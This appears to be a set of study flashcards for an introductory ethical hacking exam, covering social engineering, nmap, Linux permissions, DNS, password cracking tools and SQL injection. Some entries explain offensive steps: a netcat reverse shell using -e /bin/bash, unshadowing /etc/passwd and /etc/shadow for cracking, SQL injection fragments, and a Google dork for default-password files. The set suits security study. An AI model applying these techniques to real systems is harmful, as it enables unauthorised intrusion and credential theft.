Full Test

Question 1

What does the sv mean in this. “nmap -sV 192.168.10.1 -p-“

Answer 1

Service Version of all open ports

Question 2

Spear Phishing

Answer 2

Targeting a specific company

Question 3

Pretexting

Answer 3

Fabricates a scenario or pretext to steal their victims’ personal information

Question 4

Blackmail/ Intimidation

Answer 4

Utilising information/force to compel the victim

Question 5

Baiting

Answer 5

Tricking or enticing the victim to reveal/do something

Question 6

Tailgating/Piggybacking

Answer 6

Involves an unauthorized person following an authorized individual into a restricted area or system

Question 7

Vishing

Answer 7

Using phone calls to scam the victim into divulging information

Question 8

Smishing

Answer 8

Text messages to lure victims into clicking on a malicious link or providing personal information

Question 9

Impersonation

Answer 9

Pretending to be a trusted contact or authority

Question 10

Phases of social engineering

Answer 10

Investigation
Identifying the victim(s)
Gathering background information
Selecting attack method

Hook
Engaging the target
Spinning a story
Taking control of the interaction

Play
Expanding foothold
Executing the attack
Disrupting business or/and siphoning data

Exit
Removing all traces of malware
Covering tracks
Bringing the charade to a natural end

Question 11

Information Gathering

Answer 11

Examples:
Date of birth, important dates, family date of births in 4/6 digit pin
Compiling a common wordlist from websites, social media
Using other active information gathering methods

Question 12

Disadvantages of dictionary attacks

Answer 12

Uncertain
Detection /Blacklisting
Honeypot

Question 13

Intelligent Guessing

Answer 13

Default passwords, etc

Question 14

Deception Honey pots

Answer 14

Honeypots
- Honey Users
- Honey Tokens
- Honey Pots
- Honey Nets

Obfuscation

Switching port numbers, plugin names, directory names etc

Question 15

Permission to Octal Conversion

Answer 15

Symbol | Binary | Octal |
| —— | —— | —– |
| --- | 000 | 0 |
| --x | 001 | 1 |
| -w- | 010 | 2 |
| -wx | 011 | 3 |
| r-- | 100 | 4 |
| r-x | 101 | 5 |
| rw- | 110 | 6 |
| rwx | 111 | 7 |

[File Type] [Owner] [Group] [Others]
- rwx r-x r–
———————————————————

The first character is the file type:

• = regular file

d = directory

l = symbolic link

The remaining 9 characters are permissions:

First 3 = Owner

Next 3 = Group

Last 3 = Others

r = read

w = write

x = execute

• = no permission

Question 16

What is “salting” in password security?

Answer 16

Salting is the process of adding a random string (salt) to a password before hashing it, to make each hash unique — even if users have the same password.
This helps defend against rainbow table and precomputed hash attacks.

Question 17

How do you identify a reverse shell connection using nc (Netcat)?

Answer 17

Look for these clues:

Listener side (-l -p) + -e /bin/bash or similar
→ This machine is hosting a shell to be accessed remotely.

Connecting side (nc [IP] [port])
→ This machine is connecting to the listener and will receive the shell.

If -e /bin/bash is used, the connecting machine gains interactive shell access to the listener.

💡 Rule of Thumb:

Machine with -e /bin/bash = loses control (victim)

Machine that connects = gains control (attacker)

Question 18

Forward DNS lookup from a reverse DNS lookup?

Answer 18

Forward DNS Lookup:
🔎 Converts a domain name (e.g., example.com) → IP address (93.184.216.34)
✔️ Most common type of DNS query.

Reverse DNS Lookup:
🔁 Converts an IP address → domain name
🔍 Uses PTR (pointer) records in DNS.

🧠 Remember:

Forward = Name → IP

Reverse = IP → Name

Question 19

Which tools can be used for offline cracking of password hashes?

Answer 19

🛠️ Common tools for offline hash cracking:

✅ John the Ripper – Fast and flexible password cracker.

✅ Hashcat – GPU-accelerated hash cracking tool.

✅ Hydra (for some offline modes) – Primarily online, but can be adapted.

✅ Cain & Abel (Windows-only, legacy tool)

📌 Offline cracking means:

You already have the password hashes (e.g., from /etc/shadow, SAM file).

You’re not interacting with a live login service.

Attacks like dictionary, brute force, or rule-based are used locally.

Question 20

Common DNS Record Types

Answer 20

A = Address Record
AAAA = IPv6 Address Record
CNAME = Canonical Name Record
MX = Mail Exchange Record
PTR = Pointer Record
NS = Name Server Record
SOA = Start of Authority Record
TXT = Text Record
SRV = Service Record
SPF = Sender Policy Framework
CAA = Certification Authority Authorization

Record Type | Full Name | Purpose / Description |

Question 21

What are valid defences to buffer overflow attacks?

Answer 21

Stack canaries (stack guards): Special values placed before the return address to detect corruption.

Address Space Layout Randomization (ASLR): Randomizes memory addresses to make exploitation harder.

Data Execution Prevention (DEP) / NX bit: Marks memory regions as non-executable to prevent code injection.

Bounds checking / Safe programming languages: Using languages or techniques that prevent buffer overflows.

Control Flow Integrity (CFI): Ensures program control flow follows valid paths only.

Question 22

Network Scanning & Reconnaissance

Answer 22

Nmap – Network mapper, port scanner, OS fingerprinting

Masscan – Very fast port scanner

Netdiscover – Network address discovery

Angry IP Scanner – Simple network scanner

Question 23

Packet Capture & Analysis tools

Answer 23

Wireshark – Network protocol analyzer (packet sniffer)

Tcpdump – Command-line packet analyzer

Question 24

Exploitation Frameworks

Answer 24

Metasploit Framework – Exploit development and execution platform

BeEF – Browser Exploitation Framework

Question 25

Password Cracking

Answer 25

John the Ripper – Password hash cracker Hashcat – GPU-accelerated password cracker Hydra – Online password brute force tool

Question 26

Network Communication & Tunneling

Answer 26

Netcat (nc) – Network utility for reading/writing data across networks Socat – More advanced version of Netcat for bidirectional data transfer OpenVPN – VPN tunneling tool

Question 27

Vulnerability Scanning

Answer 27

Nessus – Vulnerability scanner OpenVAS – Open-source vulnerability scanner

Question 28

Web Application Testing

Answer 28

Burp Suite – Web application security testing OWASP ZAP – Open Web Application Security Project scanner

Question 29

Wireless Security ones

Answer 29

Aircrack-ng – Wireless network auditing suite Kismet – Wireless network detector and sniffer

Question 30

How to interpret a Windows SID (Security Identifier)?

Answer 30

A SID looks like this: S-1-5-21---- S — SID prefix 1 — Revision level 5 — Identifier Authority (e.g., 5 = NT Authority) 21-... — Domain or local computer identifier (sub-authorities) RID (Relative Identifier) — Identifies the specific user or group within the domain/computer Common RID values and meanings: RID Account Type 500 Built-in Administrator 501 Guest Account 502+ Other user accounts/groups Tip: The last number in the SID is always the Relative ID (RID), which identifies the specific account. The identifier authority is the number after the revision (5 in most Windows SIDs). The sub-authorities (21-...) identify the domain or machine scope.

Question 31

What is privilege escalation, and what are the differences between horizontal and vertical privilege escalation?

Answer 31

Privilege Escalation is the act of exploiting a bug, design flaw, or configuration oversight to gain elevated access to resources that are normally protected. Types of Privilege Escalation: Horizontal Privilege Escalation: Accessing resources or actions of another user at the same privilege level (e.g., accessing another user's files or account). Vertical Privilege Escalation: Gaining higher privileges than originally granted, such as a regular user obtaining administrator or root access. Remember: Horizontal = same level, different user Vertical = higher level than you started with

Question 32

sudo | find / | -name

Answer 32

Run the command with superuser (root) privileges to access all files. Search starting from the root directory (/) through the entire filesystem. Find files with the exact name

Question 33

Which of the following commands is used to view the manual information of a command in Linux?

Answer 33

man man stands for manual. It displays the user manual/help pages for commands, programs, or system calls.

Question 34

What tools are helpful for scanning or indexing web server directories?

Answer 34

Common tools include: Dirb — Brute force scanner to find hidden directories/files. Dirbuster — GUI tool for brute forcing directories and files on web servers. Gobuster — Fast directory/file brute forcer written in Go. Nikto — Web server scanner that also finds directories and vulnerabilities. WFuzz — Web application brute forcer for directories and parameters.

Question 35

Which of the following is a possible outcome of the Linux command below? echo $SHELL

Answer 35

/bin/bash

Question 36

What are common security testing techniques used in ethical hacking and app testing?

Answer 36

Fuzzing = Sending malformed or random data to applications to find crashes or vulnerabilities. Brute Forcing = Repeatedly trying many inputs (like passwords or directories) to gain access or uncover hidden data. Penetration Testing = Simulating real-world attacks to discover and exploit security flaws. Input Validation Testing = Supplying unexpected or malicious input to test how well the application handles it. Static Code Analysis = Reviewing source code without executing it to detect security issues or bugs. Dynamic Analysis = Observing the behavior of an application during runtime to identify vulnerabilities. Vulnerability Scanning = Using automated tools to detect known security weaknesses in systems or applications. Directory/Resource Enumeration = Discovering exposed directories or files on a web server. Social Engineering = Manipulating people into revealing confidential information or performing actions that compromise security. | Technique | Description |

Question 37

chmod Octal Permission Cheat Sheet

Answer 37

Basic Octal Values: 7 = rwx → read, write, execute 6 = rw- → read, write 5 = r-x → read, execute 4 = r-- → read only 3 = -wx → write, execute 2 = -w- → write only 1 = --x → execute only 0 = --- → no permissions Special Permission Bits (1st digit before the usual 3): 4 = Setuid → runs the file with the owner's privileges 2 = Setgid → runs the file with the group's privileges 1 = Sticky Bit → only file owner can delete/rename (used on directories) Examples: chmod 4755 file → Setuid + rwxr-xr-x chmod 2755 file → Setgid + rwxr-sr-x chmod 1777 /tmp → Sticky bit + full access → rwxrwxrwt chmod 6777 file → Setuid + Setgid + rwxrwxrwx

Question 38

When attempting to crack user passwords in Linux, which of the files below do you need to "unshadow"?

Answer 38

/etc/passwd, /etc/shadow

Question 39

HTTP Status Codes Cheat Sheet

Answer 39

1xx – Informational 100 Continue: The initial part of a request has been received and the client should continue. 101 Switching Protocols: Server is switching protocols as requested by client. 2xx – Success 200 OK: Request succeeded and response contains requested data. 201 Created: Resource successfully created. 204 No Content: Request succeeded but no content to return. 3xx – Redirection 301 Moved Permanently: Resource has permanently moved to a new URL. 302 Found: Temporary redirect to a different URL. 304 Not Modified: Resource has not changed since last request. 4xx – Client Errors 400 Bad Request: The server could not understand the request due to invalid syntax. 401 Unauthorized: Authentication is required and has failed or not been provided. 403 Forbidden: Server understands the request but refuses to authorize it. 404 Not Found: Requested resource could not be found. 405 Method Not Allowed: Request method is not supported for the resource. 5xx – Server Errors 500 Internal Server Error: Generic server error, unable to fulfill the request. 501 Not Implemented: Server does not support the functionality required. 502 Bad Gateway: Invalid response from an upstream server. 503 Service Unavailable: Server is currently unavailable (overloaded or down). 504 Gateway Timeout: Server did not receive a timely response from an upstream server.

Question 40

What is the specific purpose of the command below? objdump -d PasswordChecker

Answer 40

Display disassemble information from Password Checker

Question 41

SQL Injection Types Cheat Card

Answer 41

Classic Union-based SQL Injection Uses the UNION operator to combine the results of the original query with attacker-controlled queries. Example: Appending UNION SELECT to extract data from other tables. Time-based Blind SQL Injection Exploits delays in the database response to infer true/false conditions. Sends queries that cause the database to pause (e.g., WAITFOR DELAY '00:00:05'). Useful when no output or errors are shown. Error-based SQL Injection Triggers database errors to reveal information about the database structure. Malformed SQL causes error messages that leak table names, columns, etc. Benchmark SQL Injection Similar to time-based but uses database benchmarking functions to cause delays. Uses functions like BENCHMARK() (in MySQL) to perform heavy computations repeatedly, indicating true/false conditions. Boolean-based SQL Injection Sends queries that evaluate to true or false and observes differences in app behavior or content. Example: Adding AND 1=1 (true) vs. AND 1=2 (false) to see if the response changes.

Question 42

Which of the following options can be used to start a local shell in an existing Meterpreter session?

Answer 42

shell

Question 43

Preventing Sensitive Data Exposure

Answer 43

Effective Methods to Prevent Sensitive Data Exposure: Encryption Encrypt sensitive data both at rest (in databases, storage) and in transit (using TLS/SSL). Access Controls Implement strict authentication and authorization to limit who can view or modify sensitive data. Data Masking & Redaction Hide or mask sensitive information in logs, UI, or error messages to avoid accidental leaks. Secure Coding Practices Validate and sanitize inputs to prevent injection attacks that could expose data. Use of Secure Protocols Always use secure communication protocols like HTTPS, SFTP, etc. Regular Audits & Monitoring Monitor access logs and perform security audits to detect unauthorized access early. Avoid Sensitive Data in URLs or Logs Never include secrets (passwords, tokens) in URLs or application logs.

Question 44

What Google dork can you use to find a spreadsheet titled “Default password for RJ45”?

Answer 44

intitle:"Default password for RJ45" filetype:xls OR filetype:xlsx OR filetype:csv OR filetype:ods Explanation: intitle:"..." searches for the exact phrase in the page title. filetype: limits search to spreadsheet files like Excel (xls, xlsx), CSV, or OpenDocument Spreadsheet (ods).

Question 45

Which commands can be used to search for files in Linux?

Answer 45

find — Search files and directories by name, type, size, date, permissions, etc. locate — Quickly find files by name using a pre-built database. grep — Search inside files for matching text patterns (not file names). which — Find the full path of a command/executable in your PATH. whereis — Locate source, binary, and manual files for a command. readlink — Shows the target of a symbolic link (not really a search, but useful). Note: find and locate are the primary commands for searching files by name or attributes.

Question 46

the items relating to Shells and Payloads.

Answer 46

Reverse Shell → Initiates a connection to the attacker's IP address:port from the target (target connects to attacker), payload → Remote code that runs after exploitation, meterpreter → staged payload using DLL injection, Bind Shell → Listens on a port (on the target) and receives incoming connections (attacker connects to victim), msfvenom → used to generate and encode payloads

Question 47

What is an effective way to mitigate SQL injection attacks in web applications?

Answer 47

Use Prepared Statements (Parameterized Queries) Separates SQL code from data, preventing attackers from injecting malicious SQL. Input Validation and Sanitization Validate and sanitize all user inputs to block malicious characters. Use Stored Procedures Encapsulate SQL logic on the database side, limiting direct SQL execution. Least Privilege Principle Limit database user permissions to only what’s necessary. Web Application Firewalls (WAFs) Detect and block SQL injection attempts.

Question 48

Which of the following tools will allow you to perform footprinting undetected?

Answer 48

whois

Question 49

Which of the following is a client-side attack?

Answer 49

A client-side attack targets the user’s device or browser rather than the server. Examples include: Cross-Site Scripting (XSS) — Injects malicious scripts into webpages viewed by users. Clickjacking — Tricks users into clicking hidden elements. Malicious browser extensions or plugins. Drive-by downloads — Automatically downloading malware when visiting a webpage. In contrast: SQL injection or server-side code injections target the server. Denial of Service (DoS) attacks target server availability.

Question 50

Which commands can be used to identify users in a Linux Bash shell?

Answer 50

who — Shows who is currently logged in. w — Displays logged-in users and their activities. id — Shows user ID (UID), group ID (GID), and group memberships of the current or specified user. users — Lists the logged-in users. finger — Provides detailed info about users (if installed). last — Shows last logged-in users history.

Question 51

banner grabbing

Answer 51

Collecting version information from running services

Question 52

Which command allows you to view all currently running processes and filter for a specific service, say, "httpd"?

Answer 52

ps aux | grep httpd